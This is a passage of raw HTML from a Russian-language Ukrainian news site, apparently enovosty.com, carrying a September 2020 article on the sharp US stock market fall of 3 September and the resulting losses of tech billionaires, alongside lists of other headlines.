href="https://enovosty.com/news_society/full/309-nemnogo-opozdalo-francuzhenke-prishlo-pismo-kotoroe-otpravili-138-let-nazad-ee-prapradedu">"Немного опоздало": француженке пришло письмо, которое отправили 138 лет назад ее прапрадеду</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816647"> <span class="postDate">18:22</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/309-rynok-iskopaemyx-uglevodorodov-skukozhivaetsya-pod-naporom-perexoda-k-novoj-energetike-krutixin">Рынок ископаемых углеводородов "скукоживается", - Михаил Крутихин</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816645"> <span class="postDate">18:06</span> <a class="postTitle" href="https://enovosty.com/news_society/full/309-v-avstralijskom-zooparke-pingvinenok-polyubil-smotret-multiki-pro-svoix-sorodichej">В австралийском зоопарке пингвиненок полюбил смотреть мультики про своих сородичей (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816641"> <span class="postDate">17:51</span> <a class="postTitle" href="https://enovosty.com/news_society/full/309-kriptovalyuta-pokoryaet-mir-v-shvejcarskom-kantone-razreshili-platit-nalogi-bitkoinom">Переход на цифровые деньги "не за горами": в Швейцарском кантоне разрешили платить налоги биткоином</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816639"> <span class="postDate">17:39</span> <a class="postTitle" href="https://enovosty.com/news_society/full/309-sbu-blokirovala-deyatelnost-prorossijskix-internet-agitatorov">СБУ блокировала деятельность пророссийских интернет-агитаторов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816635"> <span class="postDate">17:24</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/309-sotrudnicy-metro-i-drugix-kommunalnyx-predpriyatij-poluchat-dizajnerskuyu-odezhdu-foto">"Коммунальщики по-украински": cотрудники коммунальных предприятий получат дизайнерскую одежду (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816618"> <span class="postDate">17:17</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-nazvany-usloviya-torga-lukashenko-s-rossiej-budet-li-legitimnym-soyuznoe-gosudarstvo">Названы условия торга Лукашенко с Россией: будет ли легитимным "Союзное государство"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816623"> <span class="postDate">16:57</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-delo-efremova-prokuror-zaprosila-dlya-aktera-11-let-kolonii-obshhego-rezhima">Дело Ефремова: Прокурор запросила для актера 11 лет колонии общего режима</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816632"> <span class="postDate">16:49</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-v-ssha-vypustili-pervyj-serijnyj-bronetransporter-ampv-video">В США выпустили первый серийный бронетранспортер AMPV (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816625"> <span class="postDate">16:25</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/309-robot-iz-filma-zvezdnye-vojny-uzhe-ne-fantastika-r2-d2-pomogaet-v-period-pandemii">Робот из фильма "Звездные войны" уже не фантастика: R2-D2 помогает в период пандемии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816630"> <span class="postDate">16:02</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/309-mask-prodolzhaet-pokoryat-kosmos-kompaniya-spacex-zapustila-60-novyx-sputnikov-starlink-video">Маск продолжает покорять космос: компания SpaceX запустила 60 новых спутников Starlink (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816622"> <span class="postDate">14:34</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/309-zelenskij-i-ermak-vozvrashhayut-klan-yanukovicha-na-klyuchevye-posty-v-strane-geo-leros-video">Зеленский и Ермак возвращают клан Януковича на ключевые посты в стране, - Гео Лерос (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816620"> <span class="postDate">14:33</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-nichego-lichnogo-tolko-biznes-yolkin-metkoj-karikaturoj-izobrazil-skandal-vokrug-severnogo-potoka-2">"Ничего личного, только бизнес": Ёлкин меткой карикатурой изобразил скандал вокруг "Северного потока-2"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816619"> <span class="postDate">14:06</span> <a class="postTitle" href="https://enovosty.com/news_society/full/309-stalo-izvestno-kak-nakazali-zhenshhinu-kotoraya-gulyala-po-krylu-samolyota">Стало известно, как наказали женщину, которая гуляла по крылу самолёта</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816605"> <span class="postDate">14:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-v-tixom-okeane-potopili-spisannyj-amerikanskij-desantnyj-korabl-video">В Тихом океане потопили списанный американский десантный корабль (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816616"> <span class="postDate">13:18</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-rubl-otreagiroval-obvalom-na-informaciyu-ob-otravlenii-navalnogo-novichkom">Рубль отреагировал обвалом на информацию об отравлении Навального "Новичком"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816598"> <span class="postDate">12:45</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/309-vsu-usilitsya-moshhnym-udarnym-vertoletom-kiborg-v-chem-ego-preimushhestva-nad-zarubezhnymi-analogami">ВСУ усилится мощным ударным вертолетом "Киборг". В чем его уникальность и преимущества над зарубежными аналогами</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816591"> <span class="postDate">12:30</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-pervyj-otechestvennyj-avianosec-kitaya-vozvrashhaetsya-v-more-dlya-ocherednyx-uchenij">Первый отечественный авианосец Китая возвращается в море для очередных учений</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816595"> <span class="postDate">12:29</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/309-ukrainskie-voennye-pokazali-moshh-artillerii-vozle-kryma-foto">Украинские военные показали мощь артиллерии возле Крыма (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816594"> <span class="postDate">11:56</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/309-mnogoxodovka-kremlya-kotoruyu-osushhestvlyaet-op-lozinskij-ob-izmeneniyax-v-izbiratelnyj-kodeks-video">Многоходовка Кремля, которую осуществляет ОП: Лозинский об изменениях в избирательный кодекс (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816593"> <span class="postDate">11:43</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/309-nacbank-predupredil-ukraincev-mogut-bezvozvratno-poteryat-dengi">Нацбанк предупредил украинцев: Могут безвозвратно потерять деньги</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816588"> <span class="postDate">10:44</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-lukashenko-tak-trusliv-chto-beryot-v-zalozhniki-sobstvennogo-syna-ganapolskij">Лукашенко так труслив, что берёт в заложники собственного сына, - Ганапольский</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816590"> <span class="postDate">10:19</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/309-ssha-kanada-i-velikobritaniya-gotovy-nanesti-udar-po-lukashenko">США, Канада и Великобритания готовы нанести удар по Лукашенко</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816589"> <span class="postDate">09:47</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/309-ukraincy-menshe-pokupayut-i-prodayut-valyutu-nazvany-cifry">Украинцы меньше покупают и продают валюту. Названы цифры</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816587"> <span class="postDate">09:42</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/309-bez-ukrainy-prixoditsya-xudo-bloger-rasskazal-o-chudesax-rossijskogo-importozameshheniya-v-yakutii">Без Украины приходится худо: Блогер рассказал о "чудесах российского импортозамещения в Якутии"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816581"> <span class="postDate">08:37</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/309-privlech-russkix-k-otvetstvennosti-v-ssha-trebuyut-ostanovit-severnyj-potok-2">"Привлечь русских к ответственности": В США требуют остановить "Северный поток-2"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4816580"> <span class="postDate">08:19</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/309-lukashenko-ubezhdal-es-sozdat-soyuz-belarusi-i-ukrainy">Лукашенко убеждал ЕС создать союз Беларуси и Украины</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4816709"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_economy/full/409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Черный четверг на фондовом рынке США. Богачи расстались с миллиардами</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_economy">Новости экономики</a> <span>&raquo;</span> Черный четверг на фондовом рынке США. Богачи расстались с миллиардами</div><time datetime="2020-09-04T13:47:29+03:00"><span id="date">Новости экономики, 13:47:29 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%A7%D0%B5%D1%80%D0%BD%D1%8B%D0%B9+%D1%87%D0%B5%D1%82%D0%B2%D0%B5%D1%80%D0%B3+%D0%BD%D0%B0+%D1%84%D0%BE%D0%BD%D0%B4%D0%BE%D0%B2%D0%BE%D0%BC+%D1%80%D1%8B%D0%BD%D0%BA%D0%B5+%D0%A1%D0%A8%D0%90.+%D0%91%D0%BE%D0%B3%D0%B0%D1%87%D0%B8+%D1%80%D0%B0%D1%81%D1%81%D1%82%D0%B0%D0%BB%D0%B8%D1%81%D1%8C+%D1%81+%D0%BC%D0%B8%D0%BB%D0%BB%D0%B8%D0%B0%D1%80%D0%B4%D0%B0%D0%BC%D0%B8&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%A7%D0%B5%D1%80%D0%BD%D1%8B%D0%B9+%D1%87%D0%B5%D1%82%D0%B2%D0%B5%D1%80%D0%B3+%D0%BD%D0%B0+%D1%84%D0%BE%D0%BD%D0%B4%D0%BE%D0%B2%D0%BE%D0%BC+%D1%80%D1%8B%D0%BD%D0%BA%D0%B5+%D0%A1%D0%A8%D0%90.+%D0%91%D0%BE%D0%B3%D0%B0%D1%87%D0%B8+%D1%80%D0%B0%D1%81%D1%81%D1%82%D0%B0%D0%BB%D0%B8%D1%81%D1%8C+%D1%81+%D0%BC%D0%B8%D0%BB%D0%BB%D0%B8%D0%B0%D1%80%D0%B4%D0%B0%D0%BC%D0%B8&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4816709" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><p><b>Состояние основателя Amazon Джеффа Безоса за один день сократилось на 10,5 миллиардов долларов .</b></p> <div style="text-align:center;"> <div data-hyb-ssp-in-image-overlay="5ef49f174d506eacc0504d73"><img width="460" height="293" src="https://enovosty.com/wp-content/uploads/2020/09/53419cbfe581211d252158bbb8300084-460x293.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2020/09/53419cbfe581211d252158bbb8300084-e1599216385502.jpg 460w, https://enovosty.com/wp-content/uploads/2020/09/53419cbfe581211d252158bbb8300084-112x71.jpg 112w, https://enovosty.com/wp-content/uploads/2020/09/53419cbfe581211d252158bbb8300084-300x191.jpg 300w" sizes="(max-width: 460px) 100vw, 460px" /></div></div> <p>3 сентября <a class="tag" href="https://enovosty.com/tag/fondovyj-rynok-ssha" target="_blank">Фондовый рынок США</a> закрылся сильнейшие снижением. Прежде всего, такая ситуация наблюдается из-за падения акций крупнейших технологических компаний. В частности, капитализация Apple Inc. обрушилась на 8%, в денежном эквиваленте эта потеря составляет около 180 миллиардов долларов. Таким образом, <a class="tag" href="https://enovosty.com/tag/akcii" target="_blank">акции</a> Apple продемонстрировали рекордное дневное падение в истории американского фондового рынка. Самый мощный урон понес «технологический» индексNASDAQ, который пошел вниз на 650 пунктов &#8212; на 5,4% . Индекс Dow Jones снижался на 3,15%, S&#038;P 500 — на 3,6%, информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p>Понесли серьезные потери мировые техногиганты. Акции Facebook подешевели на 4%, Amazon — на 5,2%, Tesla— на 8,3%.</p><p>Всё это стало причиной того, что самые богатые техномиллиардеры понесли сильнейшие финансовые убытки. Так, основатель Amazon Джефф Безос за день стал беднее сразу на 10,5 миллиардов долларов, &#171;отец&#187; Tesla Илон Маск потерял 7 миллиардов долларов, основатель Facebook Марк Цукерберг в &#171;черный четверг&#187; не досчитался 4,7 миллиардов долларов.</p><p>Эксперты полагают, что акции айти-гигантов на протяжении последнего времени были в лидерах, потому инвесторы после сильной перекупленности решили &#171;отдохнуть&#187;. Резкий обвал произошел после ещё одного побитого рекорда S&#038;P 500 и NASDAQ, который был зафиксирован днём ранее. </p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_economy/full/2603-banki-uoll-strit-rasskazali-chto-budet-s-dollarom" >Банки Уолл-стрит рассказали, что будет с долларом</a></p><div class="tptn_counter" style="color:white;" id="tptn_counter_4816709"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4816709&amp;_wpnonce=443c96af8c"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/> <meta itemprop="width" content="512"> <meta itemprop="height" content="512"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Оксана Ельченко" /></span><meta itemprop="datePublished" content="2020-09-04T13:47:29+03:00"/><meta itemprop="dateModified" content="2020-09-04T13:47:29+03:00"/><meta itemprop="genre" content="Новости экономики"/><meta itemprop="description" content="Состояние основателя Amazon Джеффа Безоса за один день сократилось на 10,5 миллиардов долларов ."/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/09/53419cbfe581211d252158bbb8300084-460x293.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/09/53419cbfe581211d252158bbb8300084-460x293.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="293"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Оксана Ельченко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/akcii" rel="tag">акции</a>, <a href="https://enovosty.com/tag/obval-akcij" rel="tag">обвал акций</a>, <a href="https://enovosty.com/tag/fondovyj-rynok-ssha" rel="tag">Фондовый рынок США</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 240</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%A7%D0%B5%D1%80%D0%BD%D1%8B%D0%B9+%D1%87%D0%B5%D1%82%D0%B2%D0%B5%D1%80%D0%B3+%D0%BD%D0%B0+%D1%84%D0%BE%D0%BD%D0%B4%D0%BE%D0%B2%D0%BE%D0%BC+%D1%80%D1%8B%D0%BD%D0%BA%D0%B5+%D0%A1%D0%A8%D0%90.+%D0%91%D0%BE%D0%B3%D0%B0%D1%87%D0%B8+%D1%80%D0%B0%D1%81%D1%81%D1%82%D0%B0%D0%BB%D0%B8%D1%81%D1%8C+%D1%81+%D0%BC%D0%B8%D0%BB%D0%BB%D0%B8%D0%B0%D1%80%D0%B4%D0%B0%D0%BC%D0%B8&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%A7%D0%B5%D1%80%D0%BD%D1%8B%D0%B9+%D1%87%D0%B5%D1%82%D0%B2%D0%B5%D1%80%D0%B3+%D0%BD%D0%B0+%D1%84%D0%BE%D0%BD%D0%B4%D0%BE%D0%B2%D0%BE%D0%BC+%D1%80%D1%8B%D0%BD%D0%BA%D0%B5+%D0%A1%D0%A8%D0%90.+%D0%91%D0%BE%D0%B3%D0%B0%D1%87%D0%B8+%D1%80%D0%B0%D1%81%D1%81%D1%82%D0%B0%D0%BB%D0%B8%D1%81%D1%8C+%D1%81+%D0%BC%D0%B8%D0%BB%D0%BB%D0%B8%D0%B0%D1%80%D0%B4%D0%B0%D0%BC%D0%B8&url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_economy%2Ffull%2F409-chernyj-chetverg-na-fondovom-rynke-ssha-bogachi-rasstalis-s-milliardami"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4816709" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="3a470a7e99" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><br> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/en_analitics.jpg" style="margin-right: 5px;margin-bottom: -2px;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4816714"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/409-novyj-politicheskij-sezon-smozhet-li-ze-komanda-uderzhatsya-pri-vlasti">Новый политический сезон: сможет ли Зе-команда удержаться при власти?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4816696"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/409-protivostoyanie-trampa-i-bajdena-konvulsii-amerikanskoj-identichnosti">Противостояние Трампа и Байдена: Конвульсии американской идентичности</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4816310"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/3108-na-greko-tureckom-fronte-trupov-poka-net">Конфликт Греции и Турции. На греко-турецком фронте погибших пока нет</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4816308"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/3108-itogi-avgusta-vtoraya-koronavirusnaya-vojna-vyzov-dlya-mirovoj-arxitektury-bezopasnosti-russkaya-ruletka-diktatora-i">Итоги августа: Вторая коронавирусная война, вызов для мировой архитектуры безопасности и русская рулетка диктатора</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4816155"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/finance/full/2908-vvp-varranty-prestuplenie-poka-bez-nakazaniya">ВВП-варранты: преступление пока без наказания</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4815872"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/2608-roman-bessmertnyj-razgovory-o-reintegracii-donbassa-neobxodimo-prekratit-i-gotovitsya-k-vojne">Роман Бессмертный: Разговоры о реинтеграции Донбасса необходимо прекратить и готовиться к войне</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4815714"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/society/full/2508-immunolog-andrej-volyanskij-zhestkij-karantin-rastyanet-pandemiyu-v-ukraine-na-dolgie-gody">Иммунолог Андрей Волянский: Жесткий карантин растянет пандемию в Украине на долгие годы</a></div></div><div class="post" onmouseover="this.className='hpost'" 